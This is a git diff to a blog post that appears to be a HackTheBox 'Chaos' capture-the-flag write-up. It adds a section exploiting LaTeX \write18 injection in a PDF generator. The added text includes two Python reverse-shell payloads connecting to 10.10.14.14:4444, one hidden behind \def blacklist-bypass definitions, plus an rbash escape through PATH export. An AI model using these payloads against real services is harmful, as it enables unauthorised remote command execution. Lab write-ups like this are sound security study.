finished chaos user

--- a/_posts/2019-02-25-Chaos.md
+++ b/_posts/2019-02-25-Chaos.md
@@ -271,7 +271,7 @@ After transferring the base64 encoded text to two separate files on the attackin
 root@kali:~/workspace/hackthebox/Chaos# base64 -d enim_msg.b64 > enim_msg.txt; base64 -d en.b64 > en.py
 ```
 
-The data within `enim_msg.txt` is encrypted, and therefore is unintelligble. The email message from `Ayush` mentions that `enim_msg.txt` was encrypted by the `en.py` program which is shown below.
+The data within `enim_msg.txt` is encrypted, and therefore is unintelligble in its current state. The email message from `Ayush` mentions that `enim_msg.txt` was encrypted by the `en.py` program which is shown below.
 
 ```python
 def encrypt(key, filename):
@@ -305,15 +305,19 @@ def getKey(password):
 At this point, there are a few important pieces of information that will be key in reversing the encryption process:
 
 1. The `filesize` variable
+
 The `filesize` variable is simply the size in bytes of the to-be-encrypted file prepended with zeroes so that the variable is 16 bytes long. For example, a file that is 39 bytes in size will result in the `filesize` variable being `0000000000000039`
 
 2. The `IV` variable
+
 The `IV` variable is used as the [initialization vector](https://en.wikipedia.org/wiki/Initialization_vector) for data encryption. Its value will be the first 16 bytes of a file object, as created by `Random.new()` from the `Crypto.Random` Python package.
 
 3. The `encryptor` variable
+
 This variable shows that [AES](https://en.wikipedia.org/wiki/Advanced_Encryption_Standard) encryption was used in CBC mode. The same should be used during decryption.
 
 4. The `with open(outputFile, 'wb') as outfile:` line and the two lines following it
+
 These lines show that the `filesize` variable (16 bytes) and the `IV` variable (also 16 bytes) are written to the output file (i.e. `enim_msg.txt`) before any encrypted data is written. As the `IV` was used in the `encryptor` variable, the same `IV` will need to be used during decryption. 
 
 This means that the first 32 bytes of any file encrypted by this program are not encrypted. This is to say that the 33rd byte of any file encrypted by this program is always the first byte that needs to be decrypted. The first 16 bytes are the filesize padded with zeroes, and the next 16 bytes are the `IV`.
@@ -370,5 +374,92 @@ Thanks,
 Ayush
 ```
 
-## Root
+Browsing to the hidden directory from the message above uncovers a custom PDF creation application created by Chaos Inc. As suggested by the message on the page, there are three templates currently available, but only one of them is working.
 
+![pdf_creator.png](/assets/images/htb/chaos/pdf_creator.png)
+
+Using `burpsuite` to proxy the web requests made from this page, it was discovered that the system is using [LaTex](https://en.wikipedia.org/wiki/LaTeX) to write PDF files. This was discovered in the response returned by the server to a POST request, as shown below.
+
+![latex_response.png](/assets/images/htb/chaos/latex_response.png)
+
+After a bit of resarch, some very useful information was found regarding [Hacking with LaTex](https://0day.work/hacking-with-latex/). After a bit of experimenting with this discovered information, it was determined that the following text (almost entirely reused from "Hacking with LaTex") can be passed to the target system via the input field on the PDF creator web page to obtain a reverse shell on the system. This is possible since `\write18` is enabled (as visible in the response above.) 
+
+```
+\def \imm {\string\imme}
+\def \diate {diate}
+\def \eighteen {\string18}
+\def \wwrite {\string\write\eighteen}
+\def \args {\string{python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.14",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'\string}}
+% First run
+\newwrite\outfile
+\openout\outfile=cmd.tex
+\write\outfile{\imm\diate\wwrite\args}
+\closeout\outfile
+% Second run
+\newread\file
+\openin\file=cmd.tex
+\read\file to\fileline 
+\fileline
+\closein\file
+Run1
+```
+
+The `\def` commands are a way around blacklisted words. Ultimately, the `\def` commands are used to create variables that when combined form blacklisted words/commands.
+
+For this to work, the PDF creation process needs to run twice. The first time, the `cmd.tex` file will be written to the system which contains the Python reverse shell exploit code. The second time the process is run, `cmd.tex` is read and the commands within are executed.
+
+*Note that this method is rather finicky (and unnecessary). Looking at other writeups for this machine suggests that the blacklist-bypassing "\def" commands are not needed and that a more straight forward shell can be obtained using the command shown below.*
+
+```
+\immediate\write18{python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.14",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'}
+```
+
+Ater a shell connection is established and [upgraded](https://mnorris.io/hackthebox/Curling/#shell_upgrade), `su` can be used to switch users from `www-data` to `ayash` who has reused the previously-discovered `jiujitsu` password.
+
+```
+www-data@chaos:/$ su --login ayush
+```
+
+The `ayush` user's default shell is `rbash`, which is a restricted shell. This means that very few commands can be run from within the shell. The text below shows an example of the `cd` command failing and that the user's shell is `rbash`.
+
+```
+ayush@chaos:/$ cd /home
+rbash: cd: restricted
+ayush@chaos:/$ echo $SHELL
+/opt/rbash
+```
+
+An additional error message is received when attempting to run commands with `/` in them (or any command that isn't in set within the `ayush` user's PATH variable):
+
+```ayush@chaos:/$ ls
+rbash: /usr/lib/command-not-found: restricted: cannot specify `/' in command names
+ayush@chaos:/$ echo $PATH
+/home/ayush/.app
+```
+
+As the `echo` command is allowed, the following command was issued to discover which programs `ayush` is able to run.
+
+```
+ayush@chaos:/$ echo /home/ayush/.app/* 
+/home/ayush/.app/dir /home/ayush/.app/ping /home/ayush/.app/tar
+```
+
+This shows that the `ayush` user is only allowed to run `dir`, `ping`, and `tar`.
+
+ Note that previously the command `su --login ayush` was issued when switching from the `www-data` user to the `ayush` user. Using the `su` command along with `-`, `l`, or `--login` (they all do the same thing) will (from `man su`) "start the shell as a login shell with an environment similar to a real login." Logging in as the `ayush` user in this way allows for a simple escape from the `rbash` shell. A new PATH variable was exported, escaping the `ayush` user from the restricted shell.
+
+ ```
+ayush@chaos:~$ export PATH=/bin:/usr/bin/:$PATH
+ayush@chaos:~$ echo $PATH
+/bin:/usr/bin/:/home/ayush/.app
+ayush@chaos:~$ /bin/bash
+```
+
+From here, the `user.txt` flag can be read.
+
+```
+ayush@chaos:~$ cat user.txt
+eef39126<redacted>
+```
+
+## Root
